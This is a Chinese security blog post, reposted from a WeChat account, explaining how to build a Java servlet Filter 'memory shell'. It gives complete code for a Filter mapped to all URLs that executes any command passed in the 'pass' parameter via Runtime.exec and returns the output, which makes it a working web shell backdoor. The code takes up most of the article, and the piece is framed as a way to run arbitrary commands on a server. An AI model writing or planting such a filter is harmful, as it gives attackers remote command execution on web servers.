简单的JAVA Filter内存马编写

admin

75411
文章

56
评论

2022年1月23日19:58:06评论32 views字数 2726阅读9分5秒阅读模式

1 Filter过滤器

过滤器实际上就是对web资源进行拦截，做一些处理后再交给下一个过滤器或servlet处理。
通常都是用来拦截request进行处理的，也可以对返回的response进行拦截处理。

大概流程图如下：

2 内存马

既然在请求Servlet时会经过Filter过滤器，那么我们可以在Filter过滤器上添加恶意代码，从而执行我们想要的命令，达到Web马的效果。

3 Filter内存马实现

（1）本次用的Maven项目搭建。需要引入servlet包

<dependency>  <groupId>javax.servlet</groupId>  <artifactId>javax.servlet-api</artifactId>  <version>3.1.0</version></dependency>

（2）创建一个Filter类，重写相关方法

public class MyFilter implements Filter {    @Override    public void init(FilterConfig filterConfig) throws ServletException {
    }
    @Override    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {     }
    @Override    public void destroy() {
    }}

（3）添加全局过滤，也可指定某一URL拦截

@WebFilter(urlPatterns = "/*")

（4）doFilter是具体实现方法，我们把一句话写在下面，使用一个IF进行判断拦截，具有pass参数进入一句话

@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {    if(servletRequest.getParameter("pass")!=null){        String cmd = servletRequest.getParameter("pass");        Process process = Runtime.getRuntime().exec(cmd);        InputStream in = process.getInputStream();        InputStreamReader input = new InputStreamReader(in);        BufferedReader reader = new BufferedReader(input);        String s = null;        servletResponse.getWriter().print("<pre>");        while ((s = reader.readLine())!=null){            servletResponse.getWriter().println(s);        }        servletResponse.getWriter().print("</pre>");
        servletResponse.getWriter().flush();    }    filterChain.doFilter(servletRequest,servletResponse);}

（5）启动项目，在任意路径都可以实现命令执行
简单的JAVA Filter内存马编写

4 完整代码

import javax.servlet.*;import javax.servlet.annotation.WebFilter;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStream;import java.io.InputStreamReader;
@WebFilter(urlPatterns = "/*")public class MyFilter implements Filter {    @Override    public void init(FilterConfig filterConfig) throws ServletException {
    }
    @Override    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {        if(servletRequest.getParameter("pass")!=null){            String cmd = servletRequest.getParameter("pass");            Process process = Runtime.getRuntime().exec(cmd);            InputStream in = process.getInputStream();            InputStreamReader input = new InputStreamReader(in);            BufferedReader reader = new BufferedReader(input);            String s = null;            servletResponse.getWriter().print("<pre>");            while ((s = reader.readLine())!=null){                servletResponse.getWriter().println(s);            }            servletResponse.getWriter().print("</pre>");
            servletResponse.getWriter().flush();        }        filterChain.doFilter(servletRequest,servletResponse);    }
    @Override    public void destroy() {
    }}

5 参考文章

https://mp.weixin.qq.com/s?__biz=Mzg2NjU0MjA0Ng==&mid=2247485539&idx=1&sn=796ff115ac4c9fe9383455ff1a332d9chttps://blog.csdn.net/yuzhiqiang_1993/article/details/81288912

原文始发于微信公众号（Reset安全）：简单的JAVA Filter内存马编写

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究，若将其信息做其他用途，由用户承担全部法律及连带责任，本站不承担任何法律及连带责任，请遵守中华人民共和国安全法.

我的微信
微信扫一扫

我的微信公众号
微信扫一扫

简单的JAVA Filter内存马编写

OPC UA .NET Standard Stack 资源耗尽漏洞分析-05-26

光速下班，用IAST挖CNVD通用漏洞

OSCP渗透靶场之Vulnhub-DC6

HTB打靶：Soccer

网络安全知识：什么是区块链安全？

小技巧-给工具用上代理池

几个问题，帮你彻底搞懂工业互联网

记一次Spring Devtools反序列化利用

Everything信息泄露漏洞复现

wireshark和威胁分析

发表评论

在线咨询

微信